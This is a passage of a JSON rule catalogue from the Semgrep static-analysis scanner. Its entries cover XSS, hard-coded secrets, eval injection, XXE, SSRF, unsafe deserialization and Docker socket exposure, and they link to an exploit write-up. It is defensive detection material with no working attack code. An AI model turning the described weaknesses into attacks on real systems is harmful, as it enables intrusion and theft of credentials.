Rule](https://semgrep.dev/r/typescript.react.security.react-markdown-insecure-html.react-markdown-insecure-html)\n - [https://www.npmjs.com/package/react-markdown#security](https://www.npmjs.com/package/react-markdown#security)\n","text":"Overwriting `transformLinkUri` or `transformImageUri` to something insecure, or turning `allowDangerousHtml` on, or turning `escapeHtml` off, will open the code up to XSS vectors."},"helpUri":"https://semgrep.dev/r/typescript.react.security.react-markdown-insecure-html.react-markdown-insecure-html","id":"typescript.react.security.react-markdown-insecure-html.react-markdown-insecure-html","name":"typescript.react.security.react-markdown-insecure-html.react-markdown-insecure-html","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: typescript.react.security.react-markdown-insecure-html.react-markdown-insecure-html"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.lang.hardcoded.headers.hardcoded-github-token.hardcoded-github-token)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/javascript.lang.hardcoded.headers.hardcoded-github-token.hardcoded-github-token","id":"javascript.lang.hardcoded.headers.hardcoded-github-token.hardcoded-github-token","name":"javascript.lang.hardcoded.headers.hardcoded-github-token.hardcoded-github-token","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.lang.hardcoded.headers.hardcoded-github-token.hardcoded-github-token"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found user controlled content in `run_string`. This is dangerous because it allows a malicious actor to run arbitrary Python code."},"help":{"markdown":"Found user controlled content in `run_string`. This is dangerous because it allows a malicious actor to run arbitrary Python code.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.dangerous-subinterpreters-run-string.dangerous-subinterpreters-run-string)\n - [https://bugs.python.org/issue43472](https://bugs.python.org/issue43472)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n","text":"Found user controlled content in `run_string`. This is dangerous because it allows a malicious actor to run arbitrary Python code."},"helpUri":"https://semgrep.dev/r/python.lang.security.dangerous-subinterpreters-run-string.dangerous-subinterpreters-run-string","id":"python.lang.security.dangerous-subinterpreters-run-string.dangerous-subinterpreters-run-string","name":"python.lang.security.dangerous-subinterpreters-run-string.dangerous-subinterpreters-run-string","properties":{"precision":"very-high","tags":["CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.dangerous-subinterpreters-run-string.dangerous-subinterpreters-run-string"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Because portions of the logging configuration are passed through eval(), use of this function may open its users to a security risk. While the function only binds to a socket on localhost, and so does not accept connections from remote machines, there are scenarios where untrusted code could be run under the account of the process which calls listen(). To avoid this happening, use the `verify()` argument to `listen()` to prevent unrecognized configurations."},"help":{"markdown":"Because portions of the logging configuration are passed through eval(), use of this function may open its users to a security risk. While the function only binds to a socket on localhost, and so does not accept connections from remote machines, there are scenarios where untrusted code could be run under the account of the process which calls listen(). To avoid this happening, use the `verify()` argument to `listen()` to prevent unrecognized configurations.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.logging.listeneval.listen-eval)\n - [https://docs.python.org/3/library/logging.config.html?highlight=security#logging.config.listen](https://docs.python.org/3/library/logging.config.html?highlight=security#logging.config.listen)\n","text":"Because portions of the logging configuration are passed through eval(), use of this function may open its users to a security risk. While the function only binds to a socket on localhost, and so does not accept connections from remote machines, there are scenarios where untrusted code could be run under the account of the process which calls listen(). To avoid this happening, use the `verify()` argument to `listen()` to prevent unrecognized configurations."},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.logging.listeneval.listen-eval","id":"python.lang.security.audit.logging.listeneval.listen-eval","name":"python.lang.security.audit.logging.listeneval.listen-eval","properties":{"precision":"very-high","tags":["CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.logging.listeneval.listen-eval"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The preceding call to `$SOURCE` can return a negative value when an error is encountered. This can lead to an out-of-bounds array access and possible memory corruption."},"help":{"markdown":"The preceding call to `$SOURCE` can return a negative value when an error is encountered. This can lead to an out-of-bounds array access and possible memory corruption.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.memory.negative-return-value-array-index.negative-return-value-array-index)\n - [https://cwe.mitre.org/data/definitions/787.html](https://cwe.mitre.org/data/definitions/787.html)\n","text":"The preceding call to `$SOURCE` can return a negative value when an error is encountered. This can lead to an out-of-bounds array access and possible memory corruption."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.memory.negative-return-value-array-index.negative-return-value-array-index","id":"cpp.lang.security.memory.negative-return-value-array-index.negative-return-value-array-index","name":"cpp.lang.security.memory.negative-return-value-array-index.negative-return-value-array-index","properties":{"precision":"very-high","tags":["CWE-787: Out-of-bounds Write","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.memory.negative-return-value-array-index.negative-return-value-array-index"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"DOCTYPE declarations are enabled for this DocumentBuilderFactory. This is vulnerable to XML external entity attacks. Disable this by setting the feature \"http://apache.org/xml/features/disallow-doctype-decl\" to true. Alternatively, allow DOCTYPE declarations and only prohibit external entities declarations. This can be done by setting the features \"http://xml.org/sax/features/external-general-entities\" and \"http://xml.org/sax/features/external-parameter-entities\" to false."},"help":{"markdown":"DOCTYPE declarations are enabled for this DocumentBuilderFactory. This is vulnerable to XML external entity attacks. Disable this by setting the feature \"http://apache.org/xml/features/disallow-doctype-decl\" to true. Alternatively, allow DOCTYPE declarations and only prohibit external entities declarations. This can be done by setting the features \"http://xml.org/sax/features/external-general-entities\" and \"http://xml.org/sax/features/external-parameter-entities\" to false.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.xxe.documentbuilderfactory-disallow-doctype-decl-missing.documentbuilderfactory-disallow-doctype-decl-missing)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n - [https://blog.sonarsource.com/secure-xml-processor](https://blog.sonarsource.com/secure-xml-processor)\n - [https://xerces.apache.org/xerces2-j/features.html](https://xerces.apache.org/xerces2-j/features.html)\n","text":"DOCTYPE declarations are enabled for this DocumentBuilderFactory. This is vulnerable to XML external entity attacks. Disable this by setting the feature \"http://apache.org/xml/features/disallow-doctype-decl\" to true. Alternatively, allow DOCTYPE declarations and only prohibit external entities declarations. This can be done by setting the features \"http://xml.org/sax/features/external-general-entities\" and \"http://xml.org/sax/features/external-parameter-entities\" to false."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.xxe.documentbuilderfactory-disallow-doctype-decl-missing.documentbuilderfactory-disallow-doctype-decl-missing","id":"java.lang.security.audit.xxe.documentbuilderfactory-disallow-doctype-decl-missing.documentbuilderfactory-disallow-doctype-decl-missing","name":"java.lang.security.audit.xxe.documentbuilderfactory-disallow-doctype-decl-missing.documentbuilderfactory-disallow-doctype-decl-missing","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.xxe.documentbuilderfactory-disallow-doctype-decl-missing.documentbuilderfactory-disallow-doctype-decl-missing"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected use of xmlrpc. xmlrpc is not inherently safe from vulnerabilities. Use defusedxml.xmlrpc instead."},"help":{"markdown":"Detected use of xmlrpc. xmlrpc is not inherently safe from vulnerabilities. Use defusedxml.xmlrpc instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.use-defused-xmlrpc.use-defused-xmlrpc)\n - [https://pypi.org/project/defusedxml/](https://pypi.org/project/defusedxml/)\n - [https://docs.python.org/3/library/xml.html#xml-vulnerabilities](https://docs.python.org/3/library/xml.html#xml-vulnerabilities)\n","text":"Detected use of xmlrpc. xmlrpc is not inherently safe from vulnerabilities. Use defusedxml.xmlrpc instead."},"helpUri":"https://semgrep.dev/r/python.lang.security.use-defused-xmlrpc.use-defused-xmlrpc","id":"python.lang.security.use-defused-xmlrpc.use-defused-xmlrpc","name":"python.lang.security.use-defused-xmlrpc.use-defused-xmlrpc","properties":{"precision":"very-high","tags":["CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","LOW CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.use-defused-xmlrpc.use-defused-xmlrpc"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.security.tainted-ssrf-spring-format.tainted-ssrf-spring-format)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/java.spring.security.tainted-ssrf-spring-format.tainted-ssrf-spring-format","id":"java.spring.security.tainted-ssrf-spring-format.tainted-ssrf-spring-format","name":"java.spring.security.tainted-ssrf-spring-format.tainted-ssrf-spring-format","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","HIGH CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.security.tainted-ssrf-spring-format.tainted-ssrf-spring-format"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Avoid using `cPickle`, which is known to lead to code execution vulnerabilities. When unpickling, the serialized data could be manipulated to run arbitrary code. Instead, consider serializing the relevant data as JSON or a similar text-based serialization format."},"help":{"markdown":"Avoid using `cPickle`, which is known to lead to code execution vulnerabilities. When unpickling, the serialized data could be manipulated to run arbitrary code. Instead, consider serializing the relevant data as JSON or a similar text-based serialization format.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.deserialization.pickle.avoid-cPickle)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n","text":"Avoid using `cPickle`, which is known to lead to code execution vulnerabilities. When unpickling, the serialized data could be manipulated to run arbitrary code. Instead, consider serializing the relevant data as JSON or a similar text-based serialization format."},"helpUri":"https://semgrep.dev/r/python.lang.security.deserialization.pickle.avoid-cPickle","id":"python.lang.security.deserialization.pickle.avoid-cPickle","name":"python.lang.security.deserialization.pickle.avoid-cPickle","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","LOW CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.deserialization.pickle.avoid-cPickle"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Hardcoded JWT secret or private key is used. This is a Insufficiently Protected Credentials weakness: https://cwe.mitre.org/data/definitions/522.html Consider using an appropriate security mechanism to protect the credentials (e.g. keeping secrets in environment variables)"},"help":{"markdown":"Hardcoded JWT secret or private key is used. This is a Insufficiently Protected Credentials weakness: https://cwe.mitre.org/data/definitions/522.html Consider using an appropriate security mechanism to protect the credentials (e.g. keeping secrets in environment variables)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.jwt.security.jwt-hardcode.jwt-python-hardcoded-secret)\n - [https://semgrep.dev/blog/2020/hardcoded-secrets-unverified-tokens-and-other-common-jwt-mistakes/](https://semgrep.dev/blog/2020/hardcoded-secrets-unverified-tokens-and-other-common-jwt-mistakes/)\n","text":"Hardcoded JWT secret or private key is used. This is a Insufficiently Protected Credentials weakness: https://cwe.mitre.org/data/definitions/522.html Consider using an appropriate security mechanism to protect the credentials (e.g. keeping secrets in environment variables)"},"helpUri":"https://semgrep.dev/r/python.jwt.security.jwt-hardcode.jwt-python-hardcoded-secret","id":"python.jwt.security.jwt-hardcode.jwt-python-hardcoded-secret","name":"python.jwt.security.jwt-hardcode.jwt-python-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-522: Insufficiently Protected Credentials","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: python.jwt.security.jwt-hardcode.jwt-python-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Do not use `math/rand`. Use `crypto/rand` instead."},"help":{"markdown":"Do not use `math/rand`. Use `crypto/rand` instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.crypto.math_random.math-random-used)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#secure-random-number-generation](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#secure-random-number-generation)\n","text":"Do not use `math/rand`. Use `crypto/rand` instead."},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.crypto.math_random.math-random-used","id":"go.lang.security.audit.crypto.math_random.math-random-used","name":"go.lang.security.audit.crypto.math_random.math-random-used","properties":{"precision":"very-high","tags":["CWE-338: Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG)","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.crypto.math_random.math-random-used"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"AWS Secret Access Key detected"},"help":{"markdown":"AWS Secret Access Key detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-aws-secret-access-key.detected-aws-secret-access-key)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"AWS Secret Access Key detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-aws-secret-access-key.detected-aws-secret-access-key","id":"generic.secrets.security.detected-aws-secret-access-key.detected-aws-secret-access-key","name":"generic.secrets.security.detected-aws-secret-access-key.detected-aws-secret-access-key","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-aws-secret-access-key.detected-aws-secret-access-key"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a logger that logs user input without properly neutralizing the output. The log message could contain characters like ` ` and ` ` and cause an attacker to forge log entries or include malicious content into the logs. Use proper input validation and/or output encoding to prevent log entries from being forged."},"help":{"markdown":"Detected a logger that logs user input without properly neutralizing the output. The log message could contain characters like ` ` and ` ` and cause an attacker to forge log entries or include malicious content into the logs. Use proper input validation and/or output encoding to prevent log entries from being forged.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.log.tainted-log-injection-stdlib-django.tainted-log-injection-stdlib-django)\n - [https://cwe.mitre.org/data/definitions/117.html](https://cwe.mitre.org/data/definitions/117.html)\n - [https://owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures](https://owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures)\n","text":"Detected a logger that logs user input without properly neutralizing the output. The log message could contain characters like ` ` and ` ` and cause an attacker to forge log entries or include malicious content into the logs. Use proper input validation and/or output encoding to prevent log entries from being forged."},"helpUri":"https://semgrep.dev/r/python.django.log.tainted-log-injection-stdlib-django.tainted-log-injection-stdlib-django","id":"python.django.log.tainted-log-injection-stdlib-django.tainted-log-injection-stdlib-django","name":"python.django.log.tainted-log-injection-stdlib-django.tainted-log-injection-stdlib-django","properties":{"precision":"very-high","tags":["CWE-117: Improper Output Neutralization for Logs","HIGH CONFIDENCE","OWASP-A09:2021 - Security Logging and Monitoring Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.log.tainted-log-injection-stdlib-django.tainted-log-injection-stdlib-django"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Use the latest version of HTTP to ensure you are benefiting from security fixes. Add `http2_enabled = true` to your appservice resource block"},"help":{"markdown":"Use the latest version of HTTP to ensure you are benefiting from security fixes. Add `http2_enabled = true` to your appservice resource block\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.azure.security.appservice.appservice-enable-http2.appservice-enable-http2)\n - [https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs/resources/app_service#http2_enabled](https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs/resources/app_service#http2_enabled)\n","text":"Use the latest version of HTTP to ensure you are benefiting from security fixes. Add `http2_enabled = true` to your appservice resource block"},"helpUri":"https://semgrep.dev/r/terraform.azure.security.appservice.appservice-enable-http2.appservice-enable-http2","id":"terraform.azure.security.appservice.appservice-enable-http2.appservice-enable-http2","name":"terraform.azure.security.appservice.appservice-enable-http2.appservice-enable-http2","properties":{"precision":"very-high","tags":["CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')","MEDIUM CONFIDENCE","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.azure.security.appservice.appservice-enable-http2.appservice-enable-http2"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected non-literal calls to Deno.run(). This could lead to a command injection vulnerability."},"help":{"markdown":"Detected non-literal calls to Deno.run(). This could lead to a command injection vulnerability.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.deno.security.audit.deno-dangerous-run.deno-dangerous-run)\n - [https://deno.land/manual/examples/subprocess#simple-example](https://deno.land/manual/examples/subprocess#simple-example)\n","text":"Detected non-literal calls to Deno.run(). This could lead to a command injection vulnerability."},"helpUri":"https://semgrep.dev/r/javascript.deno.security.audit.deno-dangerous-run.deno-dangerous-run","id":"javascript.deno.security.audit.deno-dangerous-run.deno-dangerous-run","name":"javascript.deno.security.audit.deno-dangerous-run.deno-dangerous-run","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.deno.security.audit.deno-dangerous-run.deno-dangerous-run"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts. This approach ensures session cookies are secure by default. It is also possible to use the flask-talisman extension to enforce a secure configuration."},"help":{"markdown":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts. This approach ensures session cookies are secure by default. It is also possible to use the flask-talisman extension to enforce a secure configuration.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.web.flask-cookie-app-config-httponly-false.flask-cookie-app-config-httponly-false)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts. This approach ensures session cookies are secure by default. It is also possible to use the flask-talisman extension to enforce a secure configuration."},"helpUri":"https://semgrep.dev/r/python.flask.web.flask-cookie-app-config-httponly-false.flask-cookie-app-config-httponly-false","id":"python.flask.web.flask-cookie-app-config-httponly-false.flask-cookie-app-config-httponly-false","name":"python.flask.web.flask-cookie-app-config-httponly-false.flask-cookie-app-config-httponly-false","properties":{"precision":"very-high","tags":["CWE-1004: Sensitive Cookie Without 'HttpOnly' Flag","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.web.flask-cookie-app-config-httponly-false.flask-cookie-app-config-httponly-false"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.deserialization.tainted-pandas-pickle-fastapi.tainted-pandas-pickle-fastapi)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://pandas.pydata.org/docs/reference/api/pandas.read_pickle.html](https://pandas.pydata.org/docs/reference/api/pandas.read_pickle.html)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://redfoxsec.com/blog/insecure-deserialization-in-python/](https://redfoxsec.com/blog/insecure-deserialization-in-python/)\n - [https://www.exploit-db.com/exploits/49585](https://www.exploit-db.com/exploits/49585)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data."},"helpUri":"https://semgrep.dev/r/python.fastapi.deserialization.tainted-pandas-pickle-fastapi.tainted-pandas-pickle-fastapi","id":"python.fastapi.deserialization.tainted-pandas-pickle-fastapi.tainted-pandas-pickle-fastapi","name":"python.fastapi.deserialization.tainted-pandas-pickle-fastapi.tainted-pandas-pickle-fastapi","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.deserialization.tainted-pandas-pickle-fastapi.tainted-pandas-pickle-fastapi"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Directory listing/indexing is enabled, which may lead to disclosure of sensitive directories and files. It is recommended to disable directory listing unless it is a public resource. If you need directory listing, ensure that sensitive files are inaccessible when querying the resource."},"help":{"markdown":"Directory listing/indexing is enabled, which may lead to disclosure of sensitive directories and files. It is recommended to disable directory listing unless it is a public resource. If you need directory listing, ensure that sensitive files are inaccessible when querying the resource.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.security.audit.express-check-directory-listing.express-check-directory-listing)\n - [https://www.npmjs.com/package/serve-index](https://www.npmjs.com/package/serve-index)\n - [https://www.acunetix.com/blog/articles/directory-listing-information-disclosure/](https://www.acunetix.com/blog/articles/directory-listing-information-disclosure/)\n","text":"Directory listing/indexing is enabled, which may lead to disclosure of sensitive directories and files. It is recommended to disable directory listing unless it is a public resource. If you need directory listing, ensure that sensitive files are inaccessible when querying the resource."},"helpUri":"https://semgrep.dev/r/javascript.express.security.audit.express-check-directory-listing.express-check-directory-listing","id":"javascript.express.security.audit.express-check-directory-listing.express-check-directory-listing","name":"javascript.express.security.audit.express-check-directory-listing.express-check-directory-listing","properties":{"precision":"very-high","tags":["CWE-548: Exposure of Information Through Directory Listing","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A06:2017 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.security.audit.express-check-directory-listing.express-check-directory-listing"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The Dockerfile(image) mounts docker.sock to the container which may allow an attacker already inside of the container to escape container and execute arbitrary commands on the host machine."},"help":{"markdown":"The Dockerfile(image) mounts docker.sock to the container which may allow an attacker already inside of the container to escape container and execute arbitrary commands on the host machine.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/dockerfile.security.dockerd-socket-mount.dockerfile-dockerd-socket-mount)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Docker_Security_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Docker_Security_Cheat_Sheet.html)\n - [https://redfoxsec.com/blog/insecure-volume-mounts-in-docker/](https://redfoxsec.com/blog/insecure-volume-mounts-in-docker/)\n - [https://blog.quarkslab.com/why-is-exposing-the-docker-socket-a-really-bad-idea.html](https://blog.quarkslab.com/why-is-exposing-the-docker-socket-a-really-bad-idea.html)\n","text":"The Dockerfile(image) mounts docker.sock to the container which may allow an attacker already inside of the container to escape container and execute arbitrary commands on the host machine."},"helpUri":"https://semgrep.dev/r/dockerfile.security.dockerd-socket-mount.dockerfile-dockerd-socket-mount","id":"dockerfile.security.dockerd-socket-mount.dockerfile-dockerd-socket-mount","name":"dockerfile.security.dockerd-socket-mount.dockerfile-dockerd-socket-mount","properties":{"precision":"very-high","tags":["CWE-269: Improper Privilege Management","CWE-862: Missing Authorization","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: dockerfile.security.dockerd-socket-mount.dockerfile-dockerd-socket-mount"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and 